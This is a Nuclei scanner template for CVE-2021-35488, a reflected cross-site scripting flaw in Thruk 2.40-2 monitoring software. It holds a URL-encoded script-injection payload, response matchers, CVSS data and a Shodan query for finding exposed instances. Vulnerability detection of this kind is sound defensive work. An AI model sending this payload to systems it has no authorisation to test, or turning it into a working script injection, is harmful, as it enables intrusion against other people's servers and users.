nuclei-templates/cves/2021/CVE-2021-35488.yaml

39 lines
1.2 KiB
YAML
Raw Normal View History

2022-08-14 21:31:30 +00:00
id: CVE-2021-35488
info:
2022-08-15 06:34:19 +00:00
name: Thruk 2.40-2 - Cross Site Scripting
2022-08-14 21:31:30 +00:00
author: arafatansari
severity: medium
description: |
Thruk 2.40-2 allows /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] Reflected XSS via the host or title parameter. An attacker could inject arbitrary JavaScript into status.cgi. The payload would be triggered every time an authenticated user browses the page containing it.
reference:
- https://www.gruppotim.it/redteam
2022-08-15 06:34:19 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-35488
- https://www.thruk.org/changelog.html
2022-08-15 06:34:19 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-08-15 06:34:19 +00:00
cve-id: CVE-2021-35488
cwe-id: CWE-79
2022-08-14 21:31:30 +00:00
metadata:
shodan-query: http.html:"Thruk"
verified: "true"
2022-08-15 06:34:19 +00:00
tags: cve,cve2021,thruk,xss
2022-08-14 21:31:30 +00:00
requests:
- method: GET
path:
2022-08-15 06:34:19 +00:00
- "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-08-14 21:31:30 +00:00
matchers-condition: and
matchers:
2022-08-15 06:34:19 +00:00
- type: word
words:
- "'></script><script>alert(document.domain)</script>"
- "Thruk Monitoring"
condition: and
2022-08-14 21:31:30 +00:00
- type: status
status:
- 401